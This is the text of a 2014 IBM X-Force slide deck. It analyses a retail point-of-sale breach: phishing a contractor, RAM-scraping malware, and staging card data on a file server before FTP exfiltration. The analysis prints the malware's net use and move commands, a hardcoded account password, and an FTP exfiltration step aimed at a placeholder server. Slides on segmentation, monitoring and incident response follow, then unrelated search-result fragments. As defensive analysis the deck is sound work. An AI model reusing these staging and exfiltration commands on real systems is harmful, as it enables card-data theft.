Published on February 19, 2014
IBM Security Systems Anatomy of an Advanced Retail Breach Chris Poulin Research Strategist, X-Force February 2014 © 2014 IBM Corporation 1 © 2012 IBM Corporation
IBM Security Systems Agenda About the IBM X-Force Dissection of a retail attack and data breach Solutions to prevent similar compromises Note: Information provided by IBM in this webinar and the associated blog entry is derived from research by the author and/or the IBM X-Force, and is based on publicly available sources. No information was obtained by, or otherwise derived from, any confidential information shared with IBM. 2 © 2014 IBM Corporation
IBM Security Systems X-Force is the foundation for advanced security and threat research across the IBM Security Framework The mission of X-Force is to: Monitor and evaluate the rapidly changing threat landscape Research new attack techniques and develop protection for tomorrow’s security challenges Educate our customers and the general public 3 © 2014 IBM Corporation
IBM Security Systems Collaborative IBM teams monitor and analyze the changing threat landscape Coverage Depth 20,000+ devices 17B analyzed under contract 3,700+ managed clients worldwide 15B+ events managed per day 133 monitored countries (MSS) 1,000+ security related patents 4 web pages & images 40M spam & phishing attacks 73K documented vulnerabilities Billions of intrusion attempts daily Millions of unique malware samples © 2014 IBM Corporation
IBM Security Systems Anatomy of the Breach Attacker phishes a 3rd party contractor 4 Malware scrapes RAM for clear text CC stripe data Attacker finds & infects POS systems w/malware 1 3b Attacker uses stolen credentials to access contractor portals 2 Retailer POS systems 5 Attacker finds & infects internal Windows file server Malware sends CC data to internal server; sends custom ping to notify 3a Contractor portals Firewall 6 Attacker FTP servers (external/Russia) 5 Retailer Windows file server Stolen data is exfiltrated to FTP servers internal network © 2014 IBM Corporation
IBM Security Systems 1. Phish a 3rd Party Contractor Attacker phishes a 3rd party contractor 1 HVAC firm in PA Email malware campaign Citadel password stealing bot, variant of Zeus banking trojan Primary method of malware detection free version of Malwarebytes Anti-Malware On-demand scanning; not for commercial use Supplier portal contains lots of public information – Example: list of resources for HVAC companies 6 © 2014 IBM Corporation
IBM Security Systems 2. Access & exploit contractor portal Attacker uses stolen credentials to access contractor portal 2 service.ariba.com 126.96.36.199 NS @ ariba.com Contractor portal Contractors generally not required to use token or other 2-factor authentication amlogin.ewips.partnersonline.com 188.8.131.52, NS @ retailer.com pdzone.retailer.com, 184.108.40.206, NS @ retailer.com 7 © 2014 IBM Corporation
IBM Security Systems 3a. Discover & exploit internal file server Attacker finds & infects internal Windows file server 3a Exact method of movement from portal to internal server unknown Probably not HVAC partner—cloud-based, not on retailer extranet Retailer Windows file server Back-end connect from partner portal or other retailer owned asset? SQL injection, browser exploit, open ingress port, who knows? Or maybe contractors had access to internal network to monitor HVAC systems remotely 8 © 2014 IBM Corporation
IBM Security Systems 3a. Discover & exploit internal file server (cont’d) Attacker finds & infects internal Windows file server 3a Intel from contractor portal? Lots of resources; example: Excel spreadsheets with useful metadata – Created by username John.Doe – Printed recently on Windows DOMAIN Google search easily reveals location of retail datacenters: Retailer Windows file server Malware to accumulate stolen card data and exfiltrate regularly (may have been 2 separate servers) – Username=―Best1_user‖; password=―BackupU$r‖ – Same username is installed with BMC Software Performance Assurance for Microsoft Server; password is not generated by BMC – Installed as ―BladeLogic‖, hiding as BMC component, BladeLogic Automation Suite; however, BMC doesn’t name any component ―bladelogic.exe‖ – System / Administrator level account; can run batch jobs 9 © 2014 IBM Corporation
IBM Security Systems 3b. Find & infect POS systems With a point of presence on an internal server, it’s all unicorns and rainbows from here. Evil unicorns Attacker finds & infects POS systems w/malware 3b Retailer POS systems Retailer Windows file server Image source: http://bigsnarf.wordpress.com/2013/03/10/using-mapreduce-for-fraud-detection-and-prevention/ 10 © 2014 IBM Corporation
IBM Security Systems 4. Malware scrapes card data from RAM 4 Malware scrapes RAM for clear text CC stripe data Trojan.POSRAM, variant of BlackPOS No anti-virus solution had a signature for the malware at the time of the attack, or at the time of disclosure Retailer POS systems Looks for ―pos.exe‖ process Installs trojan, creates registry entries containing string ―POSWDS‖ Scrape RAM for track 1 and track 2 data of financial cards Card track data is encrypted – Between the reader and POS, and – again between the POS and payment processor Unencrypted momentarily at the POS as the transaction is cleared Debit card PINs are hashed at the card reader Chip-and-PIN encrypts the transaction from the card to processor Stores stolen card data in file %SystemRoot%system32winxml.dll 11 © 2014 IBM Corporation
IBM Security Systems 5. Harvested card data is sent to internal rally point Moves stolen card data to a central collection point Assumes POS systems have no internet access Creates temp Windows share on domain Malware on rally point creates share in %windir%twain_32 Retailer POS systems Malware sends CC data to internal server; sends custom ping to notify 5 Encodes base64, with encoding string JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau Moves winxml.dll to <RallyPoint>_<Day>_<Mon>_<Hr>.txt POS malware sends custom ICMP to as semaphore Retailer Windows file server net use S: <HardCodedIP>c$WINDOWStwain_32 /user:Best1_user BackupU$r move %windir%system32winxml.dll S:<InfectedMachineName>_<Day>_<Month>_<Hour>.txt” net use S: /del 12 © 2014 IBM Corporation
IBM Security Systems 6. Card data is exfiltrated to FTP servers in Russia Compiles all card dumps into c:windowstwain_32a.dll Exfiltrates data via FTP to <PublicFTPServer>/public_html/cgi-bin Generates an FTP script and executes ftp –s <path>cmd.txt 6 Attacker FTP servers (external/Russia) 13 Retailer Windows file server Stolen data is exfiltrated to FTP servers © 2014 IBM Corporation
IBM Security Systems Protect endpoints The ultimate prize: – POS systems: where the card data is processed – File servers: base of operations – Web servers: initial incursion vector – Contractor workstations: intelligence, credentials Malware protection: – Contractor workstations (phishing, Citadel bot) – POS systems: RAM scraper trojan – File servers: data management and exfiltration tools – Application isolation (Intel SGX; micro-virtualization, etc) to prevent RAM scraping Patch Configuration management 14 © 2014 IBM Corporation
IBM Security Systems Protection against web and file server compromises Secure development lifecycle (SDLC) – Secure coding practices training – Static/source code analysis—manual (code review) and automated – Dynamic code analysis (esp low hanging fruit: SQL injection & XSS) – Include compiled application, web applications, mobile apps Go-live security process – Harden system (reduce footprint/services, suppress excess information, harden apps, change usernames / passwords) – Install appropriate endpoint protection and configuration management – Vulnerability scan Appropriate authentication – Separate domains / administrative credentials (identity separation) – Multi-factor authentication 15 © 2014 IBM Corporation
IBM Security Systems Segment critical assets Enumerate & classify Image source: http://nationalgeographic.com Restrict web assets’ access to internal systems Isolate public / partner facing assets from private assets Segment operational technology (OT), critical assets, and general IT Perform firewall rule analysis, paying special attention to: – assets containing sensitive data, such as cardholder information – risky protocols and flow directions For example, POS systems shouldn’t – mount Windows shares, or – send regular ICMP packets 16 © 2014 IBM Corporation
IBM Security Systems Monitor & detect: network Network activity pattern monitoring can detect: – Suspicious scanning activity as attacker maps out the network landscape – Policy violations for outbound FTP, especially to Eastern Bloc countries Network packet inspection can detect: – IPS can stop SQL injection, XSS, other more advanced attacks – Credit card number patterns in outbound data – Suspect strings in ICMP packets – Identify network traffic that is not what it seems: e.g., • Non-DNS protocol over port 53 • IRC over port 80 17 © 2014 IBM Corporation
IBM Security Systems Monitor & detect: vulnerability and anomaly detection Vulnerability scanning, including deep endpoint assessment – example: registry entries containing ―POSWDS‖ Anomaly detection – Profile behavior of critical assets, e.g., POS and HVAC systems (if remote access) – Detect deviations from baseline: • POS connecting to Windows shares • POS emitting ICMP packets – General anomalous behavior or change in network pattern: ICMP, SMB/CIFS, FTP – Profile ICMP packet sizes, normal payload contents; identify & block deviations 18 © 2014 IBM Corporation
IBM Security Systems Incident Response Speedy and complete forensics – early in the process if the compromise is detected before data is stolen, or – after a severe breach when accurate impact analysis is critical: • Which systems were compromised? • How many customers were affected? • How much of the data comprised personal information? Instrument everything feasible, – include POS systems and network activity – Enrich with context from • vulnerability assessment tools • change management transactions • security intelligence feeds. 19 © 2014 IBM Corporation
IBM Security Systems Incident / emergency response Plan should include – Detection – Response and escalation – Engaging law enforcement as appropriate – Preservation of evidence – Compliance with regulations and contractual agreements – Customer and press notification – Public relations. Engage your contracted external emergency response agency in advance – Help you prepare for a breach and – Gather context about your environment. Test your process regularly Business associate contract and assessment 20 © 2014 IBM Corporation
IBM Security Systems At IBM, the world is our security lab Security Operations Centers Security Research and Development Labs Institute for Advanced Security Branches More than 6,000 21 IBM researchers, developers, and subject matter experts ALL focused on security 3,000 IBM security patents v13-01 © 2014 IBM Corporation
Get Engaged with IBM X-Force Research and Development Follow us at @ibmsecurity and @ibmxforce Download X-Force security trend & risk reports http://www.ibm.com/security/xforce/ Subscribe to X-Force alerts at iss.net/rss.php or IBM Security blog at www.securityintelligence.com 22 IBM Security © 2014 IBM Corporation
IBM Security Systems Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed or misappropriated or can result in damage to or misuse of your systems, including to attack others. No IT system or product should be considered completely secure and no single product or security measure can be completely effective in preventing improper access. IBM systems and products are designed to be part of a comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT SYSTEMS AND PRODUCTS ARE IMMUNE FROM THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY. www.ibm.com/security © Copyright IBM Corporation 2013. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others. 23 © 2014 IBM Corporation
The personal and financial information of approximately 110 million Americans, comprising 11 GB of data, was stolen in a successful compromise of a retail ...
The Digital.NYC Channel Sign In | Support. Anatomy of an Advanced Retail Breach
Anatomy of Retail Credit Card Breaches. Blog Post created by treyford on Sep 6, 2014. Like • Show 0 Likes 0; ... Timeline of a Retail Credit Card Breach]
Anatomy Of A Retail Data Breach Cybersecurity ... This infographic from Earthlink outlines the seven-part "anatomy" of a typical retail data breach, ...
and advanced persistent threats (APT) ... These targets include retail ... core anatomy of a data breach, we can
Alert Logic's Security Research Team examines the anatomy of a breach. Login JOIN. UPLOAD ... Retail; Sales; Science; ... Anatomy of an Advanced Retail Breach.
Internet Retail Company ... Microsoft Advanced Threat ... of a Breach. Anatomy of a Breach. Anatomy of a Breach. Anatomy of a Breach. Anatomy of a Breach ...
Advanced Threats; Malware; Software ... Anatomy of the Breach. ... POS trojan, Retail, Security Breach, Security Information and Event Management (SIEM), ...
Services Advanced Edition; ... Anatomy of a Data Breach Publish date: ... as explained in the report "Anatomy of an Attack" by Uri Rivner.